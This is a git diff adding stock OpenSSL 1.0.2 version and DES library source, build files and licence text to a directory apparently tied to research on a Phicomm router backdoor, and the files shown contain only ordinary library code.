+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "cryptlib.h"
+
+#ifndef NO_WINDOWS_BRAINDEATH
+# include "buildinf.h"
+#endif
+
+const char *SSLeay_version(int t)
+{
+    if (t == SSLEAY_VERSION)
+        return OPENSSL_VERSION_TEXT;
+    if (t == SSLEAY_BUILT_ON) {
+#ifdef DATE
+# ifdef OPENSSL_USE_BUILD_DATE
+        return (DATE);
+# else
+        return ("built on: reproducible build, date unspecified");
+# endif
+#else
+        return ("built on: date not available");
+#endif
+    }
+    if (t == SSLEAY_CFLAGS) {
+#ifdef CFLAGS
+        return (CFLAGS);
+#else
+        return ("compiler: information not available");
+#endif
+    }
+    if (t == SSLEAY_PLATFORM) {
+#ifdef PLATFORM
+        return (PLATFORM);
+#else
+        return ("platform: information not available");
+#endif
+    }
+    if (t == SSLEAY_DIR) {
+#ifdef OPENSSLDIR
+        return "OPENSSLDIR: \"" OPENSSLDIR "\"";
+#else
+        return "OPENSSLDIR: N/A";
+#endif
+    }
+    return ("not available");
+}
+
+unsigned long SSLeay(void)
+{
+    return (SSLEAY_VERSION_NUMBER);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cversion.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cversion.o
new file mode 100644
index 0000000000000000000000000000000000000000..b1c1447cf8047bf42f2ce8c82f30b9a768e3669c
GIT binary patch
literal 2408
zcmbtVUvC>l5Ff`0El_YMRH{^{mOelWy*t}AffxxH64ST}cIu?+qkBGYl2gui*4<u}
z@Bj}HkCiI%CHM%u@ux3*7M_ZDLr7-EH+$J!j~5tecV>Pwvpct*8GqZ|{&J~O0ZkS7
z49+x-0{pOYCU+KM2Ws#-{8_vH*VdDT@w>TNXYq7iRaP!9sdsaESzS4uudurH<O&_N
zRonda86EUvO~C52FjB&O?D~N_4kQd_GThzW77e>@H$}54?zy38)*BzeIQ0W1qOdJu
zIg6u7>iHNT2%g*)6IV%*hRIBN{=P3KFbiC@AH~zQ2>dWTwvInp8?CjhX_^Eu*y;B1
zlFi<*Ep9l6(NsD?>UplSCqv4@8Ahp+apLS8`d&1hI(tzRB+l6NjwVqQTS4R<&3y03
ziDv4?;&t?f-ZMXtaa+(u)`8~<t7p^7HpdUWAe~4dtWC~h)E|tx!=bRIYb`{#N8SEr
z@AE#2d)?tzy}_=q28pm9x<LSNcVnY1Zax^Np-RQNeaEg_jgQlX+W4kfx9hE28O#YS
zBVWZuzu4XW16Tt1nXoD@qPH>zm9K|TIbN+?yL92=Q!EIId7EuL=7iN*eueqJF{-I$
z_+wsXua;IE<)pJZA63PZ%BZ^ds`Hjhs8-;m9315moqvWKFya?YHJ7XKaxR-f6<+-M
zHx~{o*dgcXD&sfL!|)E{4-0r!O-A#v{eAXN3jU;4;lc~(ZA2~`@2r2rPZ`&G{w3aH
ztam>OZ4bQtz&%L7-ri`?)}-wYZFSmOfSn`VlMx57${FZPu+HFBTz}6qy3BUM={M5&
zbpxkZjelU^uNnBdfzw-S|Bivz3|tsE-L0v`0%5fDdw`vsOqDxEuHuXzYAKe1Yb$xI
zz{Y9gf;~>~m2eWFLhcP4-z!tWrm-PIbj9%|ZEQU&Q8+$WKL}GBXV^@}>I7rxV0k#&
zkKL)%8U8;mFr0d@Sn(aih;}oU@5TRsYiOaa>*OAp@Q7RSDdSncLEb@Gy#u_5b~>}z
z(cg1ikrnT!`lYV?ukj6xr8AqjOw#xNVuC2^`!(+{X4VXaJYolPt`IJ0GiVECa@F%v
zn||W>4>iD?;XIG~h-=Jr{k;q<@pTcSek$hwoZ|)BOe#*m6Eu=*F@BYSjv0({F<v27
zRzJ_Ve)PLg{m=~3@w$G>?nXD*;roB%@1WW6MoBzP?qcmA1Xua~FGw+nkINA{vn*cl
MXg<w7Gocv&4+UHeO8@`>

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/COPYRIGHT b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/COPYRIGHT
new file mode 100644
index 0000000..5469e1e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/COPYRIGHT
@@ -0,0 +1,50 @@
+Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+All rights reserved.
+
+This package is an DES implementation written by Eric Young (eay@cryptsoft.com).
+The implementation was written so as to conform with MIT's libdes.
+
+This library is free for commercial and non-commercial use as long as
+the following conditions are aheared to.  The following conditions
+apply to all code found in this distribution.
+
+Copyright remains Eric Young's, and as such any Copyright notices in
+the code are not to be removed.
+If this package is used in a product, Eric Young should be given attribution
+as the author of that the SSL library.  This can be in the form of a textual
+message at program startup or in documentation (online or textual) provided
+with the package.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions
+are met:
+1. Redistributions of source code must retain the copyright
+   notice, this list of conditions and the following disclaimer.
+2. Redistributions in binary form must reproduce the above copyright
+   notice, this list of conditions and the following disclaimer in the
+   documentation and/or other materials provided with the distribution.
+3. All advertising materials mentioning features or use of this software
+   must display the following acknowledgement:
+   This product includes software developed by Eric Young (eay@cryptsoft.com)
+
+THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGE.
+
+The license and distribution terms for any publically available version or
+derivative of this code cannot be changed.  i.e. this code cannot simply be
+copied and put under another distrubution license
+[including the GNU Public License.]
+
+The reason behind this being stated in this direct manner is past
+experience in code simply being copied and the attribution removed
+from it and then being distributed as part of other packages. This
+implementation was a non-trivial and unpaid effort.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/DES.pm b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/DES.pm
new file mode 100644
index 0000000..6a175b6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/DES.pm
@@ -0,0 +1,19 @@
+package DES;
+
+require Exporter;
+require DynaLoader;
+@ISA = qw(Exporter DynaLoader);
+# Items to export into callers namespace by default
+# (move infrequently used names to @EXPORT_OK below)
+@EXPORT = qw(
+);
+# Other items we are prepared to export if requested
+@EXPORT_OK = qw(
+crypt
+);
+
+# Preloaded methods go here.  Autoload methods go after __END__, and are
+# processed by the autosplit program.
+bootstrap DES;
+1;
+__END__
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/DES.xs b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/DES.xs
new file mode 100644
index 0000000..b8050b9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/DES.xs
@@ -0,0 +1,268 @@
+#include "EXTERN.h"
+#include "perl.h"
+#include "XSUB.h"
+#include "des.h"
+
+#define deschar	char
+static STRLEN len;
+
+static int
+not_here(s)
+char *s;
+{
+    croak("%s not implemented on this architecture", s);
+    return -1;
+}
+
+MODULE = DES	PACKAGE = DES	PREFIX = des_
+
+char *
+des_crypt(buf,salt)
+	char *	buf
+	char *	salt
+
+void
+des_set_odd_parity(key)
+	des_cblock *	key
+PPCODE:
+	{
+	SV *s;
+
+	s=sv_newmortal();
+	sv_setpvn(s,(char *)key,8);
+	des_set_odd_parity((des_cblock *)SvPV(s,na));
+	PUSHs(s);
+	}
+
+int
+des_is_weak_key(key)
+	des_cblock *	key
+
+des_key_schedule
+des_set_key(key)
+	des_cblock *	key
+CODE:
+	des_set_key(key,RETVAL);
+OUTPUT:
+RETVAL
+
+des_cblock
+des_ecb_encrypt(input,ks,encrypt)
+	des_cblock *	input
+	des_key_schedule *	ks
+	int	encrypt
+CODE:
+	des_ecb_encrypt(input,&RETVAL,*ks,encrypt);
+OUTPUT:
+RETVAL
+
+void
+des_cbc_encrypt(input,ks,ivec,encrypt)
+	char *	input
+	des_key_schedule *	ks
+	des_cblock *	ivec
+	int	encrypt
+PPCODE:
+	{
+	SV *s;
+	STRLEN len,l;
+	char *c;
+
+	l=SvCUR(ST(0));
+	len=((((unsigned long)l)+7)/8)*8;
+	s=sv_newmortal();
+	sv_setpvn(s,"",0);
+	SvGROW(s,len);
+	SvCUR_set(s,len);
+	c=(char *)SvPV(s,na);
+	des_cbc_encrypt((des_cblock *)input,(des_cblock *)c,
+		l,*ks,ivec,encrypt);
+	sv_setpvn(ST(2),(char *)c[len-8],8);
+	PUSHs(s);
+	}
+
+void
+des_cbc3_encrypt(input,ks1,ks2,ivec1,ivec2,encrypt)
+	char *	input
+	des_key_schedule *	ks1
+	des_key_schedule *	ks2
+	des_cblock *	ivec1
+	des_cblock *	ivec2
+	int	encrypt
+PPCODE:
+	{
+	SV *s;
+	STRLEN len,l;
+
+	l=SvCUR(ST(0));
+	len=((((unsigned long)l)+7)/8)*8;
+	s=sv_newmortal();
+	sv_setpvn(s,"",0);
+	SvGROW(s,len);
+	SvCUR_set(s,len);
+	des_3cbc_encrypt((des_cblock *)input,(des_cblock *)SvPV(s,na),
+		l,*ks1,*ks2,ivec1,ivec2,encrypt);
+	sv_setpvn(ST(3),(char *)ivec1,8);
+	sv_setpvn(ST(4),(char *)ivec2,8);
+	PUSHs(s);
+	}
+
+void
+des_cbc_cksum(input,ks,ivec)
+	char *	input
+	des_key_schedule *	ks
+	des_cblock *	ivec
+PPCODE:
+	{
+	SV *s1,*s2;
+	STRLEN len,l;
+	des_cblock c;
+	unsigned long i1,i2;
+
+	s1=sv_newmortal();
+	s2=sv_newmortal();
+	l=SvCUR(ST(0));
+	des_cbc_cksum((des_cblock *)input,(des_cblock *)c,
+		l,*ks,ivec);
+	i1=c[4]|(c[5]<<8)|(c[6]<<16)|(c[7]<<24);
+	i2=c[0]|(c[1]<<8)|(c[2]<<16)|(c[3]<<24);
+	sv_setiv(s1,i1);
+	sv_setiv(s2,i2);
+	sv_setpvn(ST(2),(char *)c,8);
+	PUSHs(s1);
+	PUSHs(s2);
+	}
+
+void
+des_cfb_encrypt(input,numbits,ks,ivec,encrypt)
+	char *	input
+	int	numbits
+	des_key_schedule *	ks
+	des_cblock *	ivec
+	int	encrypt
+PPCODE:
+	{
+	SV *s;
+	STRLEN len;
+	char *c;
+
+	len=SvCUR(ST(0));
+	s=sv_newmortal();
+	sv_setpvn(s,"",0);
+	SvGROW(s,len);
+	SvCUR_set(s,len);
+	c=(char *)SvPV(s,na);
+	des_cfb_encrypt((unsigned char *)input,(unsigned char *)c,
+		(int)numbits,(long)len,*ks,ivec,encrypt);
+	sv_setpvn(ST(3),(char *)ivec,8);
+	PUSHs(s);
+	}
+
+des_cblock *
+des_ecb3_encrypt(input,ks1,ks2,encrypt)
+	des_cblock *	input
+	des_key_schedule *	ks1
+	des_key_schedule *	ks2
+	int	encrypt
+CODE:
+	{
+	des_cblock c;
+
+	des_ecb3_encrypt((des_cblock *)input,(des_cblock *)&c,
+		*ks1,*ks2,encrypt);
+	RETVAL= &c;
+	}
+OUTPUT:
+RETVAL
+
+void
+des_ofb_encrypt(input,numbits,ks,ivec)
+	unsigned char *	input
+	int	numbits
+	des_key_schedule *	ks
+	des_cblock *	ivec
+PPCODE:
+	{
+	SV *s;
+	STRLEN len,l;
+	unsigned char *c;
+
+	len=SvCUR(ST(0));
+	s=sv_newmortal();
+	sv_setpvn(s,"",0);
+	SvGROW(s,len);
+	SvCUR_set(s,len);
+	c=(unsigned char *)SvPV(s,na);
+	des_ofb_encrypt((unsigned char *)input,(unsigned char *)c,
+		numbits,len,*ks,ivec);
+	sv_setpvn(ST(3),(char *)ivec,8);
+	PUSHs(s);
+	}
+
+void
+des_pcbc_encrypt(input,ks,ivec,encrypt)
+	char *	input
+	des_key_schedule *	ks
+	des_cblock *	ivec
+	int	encrypt
+PPCODE:
+	{
+	SV *s;
+	STRLEN len,l;
+	char *c;
+
+	l=SvCUR(ST(0));
+	len=((((unsigned long)l)+7)/8)*8;
+	s=sv_newmortal();
+	sv_setpvn(s,"",0);
+	SvGROW(s,len);
+	SvCUR_set(s,len);
+	c=(char *)SvPV(s,na);
+	des_pcbc_encrypt((des_cblock *)input,(des_cblock *)c,
+		l,*ks,ivec,encrypt);
+	sv_setpvn(ST(2),(char *)c[len-8],8);
+	PUSHs(s);
+	}
+
+des_cblock *
+des_random_key()
+CODE:
+	{
+	des_cblock c;
+
+	des_random_key(c);
+	RETVAL=&c;
+	}
+OUTPUT:
+RETVAL
+
+des_cblock *
+des_string_to_key(str)
+char *	str
+CODE:
+	{
+	des_cblock c;
+
+	des_string_to_key(str,&c);
+	RETVAL=&c;
+	}
+OUTPUT:
+RETVAL
+
+void
+des_string_to_2keys(str)
+char *	str
+PPCODE:
+	{
+	des_cblock c1,c2;
+	SV *s1,*s2;
+
+	des_string_to_2keys(str,&c1,&c2);
+	EXTEND(sp,2);
+	s1=sv_newmortal();
+	sv_setpvn(s1,(char *)c1,8);
+	s2=sv_newmortal();
+	sv_setpvn(s2,(char *)c2,8);
+	PUSHs(s1);
+	PUSHs(s2);
+	}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/FILES0 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/FILES0
new file mode 100644
index 0000000..4c7ea2d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/FILES0
@@ -0,0 +1,96 @@
+/* General stuff */
+COPYRIGHT	- Copyright info.
+MODES.DES	- A description of the features of the different modes of DES.
+FILES		- This file.
+INSTALL		- How to make things compile.
+Imakefile	- For use with kerberos.
+README		- What this package is.
+VERSION		- Which version this is and what was changed.
+KERBEROS	- Kerberos version 4 notes.
+Makefile.PL	- An old makefile to build with perl5, not current.
+Makefile.ssl	- The SSLeay makefile
+Makefile.uni	- The normal unix makefile.
+GNUmakefile	- The makefile for use with glibc.
+makefile.bc	- A Borland C makefile
+times		- Some outputs from 'speed' on some machines.
+vms.com		- For use when compiling under VMS
+
+/* My SunOS des(1) replacement */
+des.c		- des(1) source code.
+des.man		- des(1) manual.
+
+/* Testing and timing programs. */
+destest.c	- Source for libdes.a test program.
+speed.c		- Source for libdes.a timing program.
+rpw.c		- Source for libdes.a testing password reading routines.
+
+/* libdes.a source code */
+des_crypt.man	- libdes.a manual page.
+des.h		- Public libdes.a header file.
+ecb_enc.c	- des_ecb_encrypt() source, this contains the basic DES code.
+ecb3_enc.c	- des_ecb3_encrypt() source.
+cbc_ckm.c	- des_cbc_cksum() source.
+cbc_enc.c	- des_cbc_encrypt() source.
+ncbc_enc.c	- des_cbc_encrypt() that is 'normal' in that it copies
+		  the new iv values back in the passed iv vector.
+ede_enc.c	- des_ede3_cbc_encrypt() cbc mode des using triple DES.
+cbc3_enc.c	- des_3cbc_encrypt() source, don't use this function.
+cfb_enc.c	- des_cfb_encrypt() source.
+cfb64enc.c	- des_cfb64_encrypt() cfb in 64 bit mode but setup to be
+		  used as a stream cipher.
+cfb64ede.c	- des_ede3_cfb64_encrypt() cfb in 64 bit mode but setup to be
+		  used as a stream cipher and using triple DES.
+ofb_enc.c	- des_cfb_encrypt() source.
+ofb64_enc.c	- des_ofb_encrypt() ofb in 64 bit mode but setup to be
+		  used as a stream cipher.
+ofb64ede.c	- des_ede3_ofb64_encrypt() ofb in 64 bit mode but setup to be
+		  used as a stream cipher and using triple DES.
+enc_read.c	- des_enc_read() source.
+enc_writ.c	- des_enc_write() source.
+pcbc_enc.c	- des_pcbc_encrypt() source.
+qud_cksm.c	- quad_cksum() source.
+rand_key.c	- des_random_key() source.
+read_pwd.c	- Source for des_read_password() plus related functions.
+set_key.c	- Source for des_set_key().
+str2key.c	- Covert a string of any length into a key.
+fcrypt.c	- A small, fast version of crypt(3).
+des_locl.h	- Internal libdes.a header file.
+podd.h		- Odd parity tables - used in des_set_key().
+sk.h		- Lookup tables used in des_set_key().
+spr.h		- What is left of the S tables - used in ecb_encrypt().
+des_ver.h	- header file for the external definition of the
+		  version string.
+des.doc		- SSLeay documentation for the library.
+
+/* The perl scripts - you can ignore these files they are only
+ * included for the curious */
+des.pl		- des in perl anyone? des_set_key and des_ecb_encrypt
+		  both done in a perl library.
+testdes.pl	- Testing program for des.pl
+doIP		- Perl script used to develop IP xor/shift code.
+doPC1		- Perl script used to develop PC1 xor/shift code.
+doPC2		- Generates sk.h.
+PC1		- Output of doPC1 should be the same as output from PC1.
+PC2		- used in development of doPC2.
+shifts.pl	- Perl library used by my perl scripts.
+
+/* I started making a perl5 dynamic library for libdes
+ * but did not fully finish, these files are part of that effort. */
+DES.pm
+DES.pod
+DES.xs
+t
+typemap
+
+/* The following are for use with sun RPC implementaions. */
+rpc_des.h
+rpc_enc.c
+
+/* The following are contibuted by Mark Murray <mark@grondar.za>.  They
+ * are not normally built into libdes due to machine specific routines
+ * contained in them.  They are for use in the most recent incarnation of
+ * export kerberos v 4 (eBones). */
+supp.c
+new_rkey.c
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/INSTALL b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/INSTALL
new file mode 100644
index 0000000..8aebdfe
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/INSTALL
@@ -0,0 +1,69 @@
+Check the CC and CFLAGS lines in the makefile
+
+If your C library does not support the times(3) function, change the
+#define TIMES to
+#undef TIMES in speed.c
+If it does, check the HZ value for the times(3) function.
+If your system does not define CLK_TCK it will be assumed to
+be 100.0.
+
+If possible use gcc v 2.7.?
+Turn on the maximum optimising (normally '-O3 -fomit-frame-pointer' for gcc)
+In recent times, some system compilers give better performace.
+
+type 'make'
+
+run './destest' to check things are ok.
+run './rpw' to check the tty code for reading passwords works.
+run './speed' to see how fast those optimisations make the library run :-)
+run './des_opts' to determin the best compile time options.
+
+The output from des_opts should be put in the makefile options and des_enc.c
+should be rebuilt.  For 64 bit computers, do not use the DES_PTR option.
+For the DEC Alpha, edit des.h and change DES_LONG to 'unsigned int'
+and then you can use the 'DES_PTR' option.
+
+The file options.txt has the options listed for best speed on quite a
+few systems.  Look and the options (UNROLL, PTR, RISC2 etc) and then
+turn on the relevant option in the Makefile.
+
+There are some special Makefile targets that make life easier.
+make cc		- standard cc build
+make gcc	- standard gcc build
+make x86-elf	- x86 assembler (elf), linux-elf.
+make x86-out	- x86 assembler (a.out), FreeBSD
+make x86-solaris- x86 assembler
+make x86-bsdi	- x86 assembler (a.out with primative assembler).
+
+If at all possible use the assembler (for Windows NT/95, use
+asm/win32.obj to link with).  The x86 assembler is very very fast.
+
+A make install will by default install
+libdes.a      in /usr/local/lib/libdes.a
+des           in /usr/local/bin/des
+des_crypt.man in /usr/local/man/man3/des_crypt.3
+des.man       in /usr/local/man/man1/des.1
+des.h         in /usr/include/des.h
+
+des(1) should be compatible with sunOS's but I have been unable to
+test it.
+
+These routines should compile on MSDOS, most 32bit and 64bit version
+of Unix (BSD and SYSV) and VMS, without modification.
+The only problems should be #include files that are in the wrong places.
+
+These routines can be compiled under MSDOS.
+I have successfully encrypted files using des(1) under MSDOS and then
+decrypted the files on a SparcStation.
+I have been able to compile and test the routines with
+Microsoft C v 5.1 and Turbo C v 2.0.
+The code in this library is in no way optimised for the 16bit
+operation of MSDOS.
+
+When building for glibc, ignore all of the above and just unpack into
+glibc-1.??/des and then gmake as per normal.
+
+As a final note on performace.  Certain CPUs like sparcs and Alpha often give
+a %10 speed difference depending on the link order.  It is rather anoying
+when one program reports 'x' DES encrypts a second and another reports
+'x*0.9' the speed.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Imakefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Imakefile
new file mode 100644
index 0000000..1b9b562
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Imakefile
@@ -0,0 +1,35 @@
+# This Imakefile has not been tested for a while but it should still
+# work when placed in the correct directory in the kerberos v 4 distribution
+
+SRCS=   cbc_cksm.c cbc_enc.c ecb_enc.c pcbc_enc.c \
+        qud_cksm.c rand_key.c read_pwd.c set_key.c str2key.c \
+        enc_read.c enc_writ.c fcrypt.c cfb_enc.c \
+	ecb3_enc.c ofb_enc.c ofb64enc.c
+
+OBJS=   cbc_cksm.o cbc_enc.o ecb_enc.o pcbc_enc.o \
+	qud_cksm.o rand_key.o read_pwd.o set_key.o str2key.o \
+	enc_read.o enc_writ.o fcrypt.o cfb_enc.o \
+	ecb3_enc.o ofb_enc.o ofb64enc.o
+
+GENERAL=COPYRIGHT FILES INSTALL Imakefile README VERSION makefile times \
+	vms.com KERBEROS
+DES=    des.c des.man
+TESTING=destest.c speed.c rpw.c
+LIBDES= des_crypt.man des.h des_locl.h podd.h sk.h spr.h
+
+PERL=   des.pl testdes.pl doIP doPC1 doPC2 PC1 PC2 shifts.pl
+
+CODE=    $(GENERAL) $(DES) $(TESTING) $(SRCS) $(LIBDES) $(PERL)
+
+SRCDIR=$(SRCTOP)/lib/des
+
+DBG= -O
+INCLUDE= -I$(SRCDIR)
+CC= cc
+
+library_obj_rule()
+
+install_library_target(des,$(OBJS),$(SRCS),)
+
+test(destest,libdes.a,)
+test(rpw,libdes.a,)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/KERBEROS b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/KERBEROS
new file mode 100644
index 0000000..f401b10
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/KERBEROS
@@ -0,0 +1,41 @@
+ [ This is an old file, I don't know if it is true anymore
+   but I will leave the file here - eay 21/11/95 ]
+
+To use this library with Bones (kerberos without DES):
+1) Get my modified Bones - eBones.  It can be found on
+   gondwana.ecr.mu.oz.au (128.250.1.63) /pub/athena/eBones-p9.tar.Z
+   and
+   nic.funet.fi (128.214.6.100) /pub/unix/security/Kerberos/eBones-p9.tar.Z
+
+2) Unpack this library in src/lib/des, makeing sure it is version
+   3.00 or greater (libdes.tar.93-10-07.Z).  This versions differences
+   from the version in comp.sources.misc volume 29 patchlevel2.
+   The primarily difference is that it should compile under kerberos :-).
+   It can be found at.
+   ftp.psy.uq.oz.au (130.102.32.1) /pub/DES/libdes.tar.93-10-07.Z
+
+Now do a normal kerberos build and things should work.
+
+One problem I found when I was build on my local sun.
+---
+For sunOS 4.1.1 apply the following patch to src/util/ss/make_commands.c
+
+*** make_commands.c.orig	Fri Jul  3 04:18:35 1987
+--- make_commands.c	Wed May 20 08:47:42 1992
+***************
+*** 98,104 ****
+       if (!rename(o_file, z_file)) {
+  	  if (!vfork()) {
+  	       chdir("/tmp");
+! 	       execl("/bin/ld", "ld", "-o", o_file+5, "-s", "-r", "-n",
+  		     z_file+5, 0);
+  	       perror("/bin/ld");
+  	       _exit(1);
+--- 98,104 ----
+       if (!rename(o_file, z_file)) {
+  	  if (!vfork()) {
+  	       chdir("/tmp");
+! 	       execl("/bin/ld", "ld", "-o", o_file+5, "-s", "-r",
+  		     z_file+5, 0);
+  	       perror("/bin/ld");
+  	       _exit(1);
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Makefile
new file mode 100644
index 0000000..060c647
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Makefile
@@ -0,0 +1,281 @@
+#
+# OpenSSL/crypto/des/Makefile
+#
+
+DIR=	des
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=-I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+RANLIB=		ranlib
+DES_ENC=	des_enc.o fcrypt_b.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=destest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	cbc_cksm.c cbc_enc.c  cfb64enc.c cfb_enc.c  \
+	ecb3_enc.c ecb_enc.c  enc_read.c enc_writ.c \
+	fcrypt.c ofb64enc.c ofb_enc.c  pcbc_enc.c \
+	qud_cksm.c rand_key.c rpc_enc.c  set_key.c  \
+	des_enc.c fcrypt_b.c \
+	xcbc_enc.c \
+	str2key.c  cfb64ede.c ofb64ede.c ede_cbcm_enc.c des_old.c des_old2.c \
+	read2pwd.c
+
+LIBOBJ= set_key.o  ecb_enc.o  cbc_enc.o \
+	ecb3_enc.o cfb64enc.o cfb64ede.o cfb_enc.o  ofb64ede.o \
+	enc_read.o enc_writ.o ofb64enc.o \
+	ofb_enc.o  str2key.o  pcbc_enc.o qud_cksm.o rand_key.o \
+	${DES_ENC} \
+	fcrypt.o xcbc_enc.o rpc_enc.o  cbc_cksm.o \
+	ede_cbcm_enc.o des_old.o des_old2.o read2pwd.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= des.h des_old.h
+HEADER=	des_locl.h rpc_des.h spr.h des_ver.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+des: des.o cbc3_enc.o lib
+	$(CC) $(CFLAGS) -o des des.o cbc3_enc.o $(LIB)
+
+des_enc-sparc.S:	asm/des_enc.m4
+	m4 -B 8192 asm/des_enc.m4 > des_enc-sparc.S
+dest4-sparcv9.s:	asm/dest4-sparcv9.pl
+	$(PERL) asm/dest4-sparcv9.pl $(CFLAGS) > $@
+
+des-586.s:	asm/des-586.pl ../perlasm/x86asm.pl ../perlasm/cbc.pl
+	$(PERL) asm/des-586.pl $(PERLASM_SCHEME) $(CFLAGS) > $@
+crypt586.s:	asm/crypt586.pl ../perlasm/x86asm.pl ../perlasm/cbc.pl
+	$(PERL) asm/crypt586.pl $(PERLASM_SCHEME) $(CFLAGS) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+# We need to use force because 'install' matches 'INSTALL' on case
+# insensitive systems
+FRC.install:
+install: FRC.install
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
